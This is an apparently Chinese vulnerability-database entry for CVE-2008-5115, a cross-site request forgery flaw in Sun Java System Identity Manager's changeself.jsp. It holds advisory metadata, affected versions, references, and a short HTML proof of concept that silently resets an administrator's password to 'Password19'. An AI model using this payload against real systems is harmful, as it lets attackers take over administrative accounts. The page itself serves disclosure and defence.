Sun Java System Identity Manager 'changeself.jsp' 跨站请求伪造漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116718 漏洞类型 跨站请求伪造
发布时间 2008-11-11 更新时间 2008-11-21
CVE编号 CVE-2008-5115 CNNVD-ID CNNVD-200811-275
漏洞平台 JSP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/32579
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200811-275
|漏洞详情
SunJavaSystemIdentityManager是一个完整的端到端的保护敏感数据和管理标识配置文件与许可的解决方案。(/idm/admin/changeself.jsp)中存在跨站请求伪造漏洞。由于没有使用不可预测的值来分解updatepassword请求,也没有对管理用户要求输入之前的口令,因此如果管理用户在认证到IdentityManager期间如果受骗访问了恶意的HTML页面的话就可能导致劫持管理帐号。
|漏洞EXP
source: http://www.securityfocus.com/bid/32262/info


Sun Java System Identity Manager is prone to multiple web-interface vulnerabilities, including a cross-site request-forgery issue, multiple cross-site scripting issues, multiple HTML-injection issues, and a directory-traversal vulnerability.

Successful exploits of many of these issues will allow an attacker to completely compromise the affected application.

These issues affect the following versions:

Sun Java System Identity Manager 6.0
Sun Java System Identity Manager 6.0 SP1
Sun Java System Identity Manager 6.0 SP2
Sun Java System Identity Manager 6.0 SP3
Sun Java System Identity Manager 6.0 SP4
Sun Java System Identity Manager 7.0
Sun Java System Identity Manager 7.1 

<html> <h1>CSRF attack demo - changes administrative password to 'Password19'</h1> <script> var img = new Image(); img.src = 'https://target.tld/idm/admin/changeself.jsp?id=&command=Save&activeControl=&resourceAccounts.password=Password19&resourceAccounts.confirmPassword=Passwo rd19&resourceAccounts.currentResourceAccounts%5BLighthouse%5D.selected=true'; </script> </html>
|参考资料

来源:SUNALERT
名称:243386;PatchInformation
链接:http://sunsolve.sun.com/search/document.do?assetkey=1-26-243386-1
来源:XF
名称:sun-jsim-unspecified-csrf(46553)
链接:http://xforce.iss.net/xforce/xfdb/46553
来源:SECTRACK
名称:1021170
链接:http://www.securitytracker.com/id?1021170
来源:BID
名称:32262
链接:http://www.securityfocus.com/bid/32262
来源:BUGTRAQ
名称:20081119PR07-11:Cross-siteRequestForgery(CSRF)onSunJavaSystemIdentityManager
链接:http://www.securityfocus.com/archive/1/archive/1/498479/100/0/threaded
来源:MISC
名称:http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr07-11
链接:http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr07-11
来源:VUPEN
名称:ADV-2008-3128
链接:http://www.frsirt.com/english/advisories/2008/3128
来源:SECUNIA
名称:32606
链接:http://secunia.com/advisories/32606
来源:OSVDB
名称:49766
链接:http://osvdb.org/49766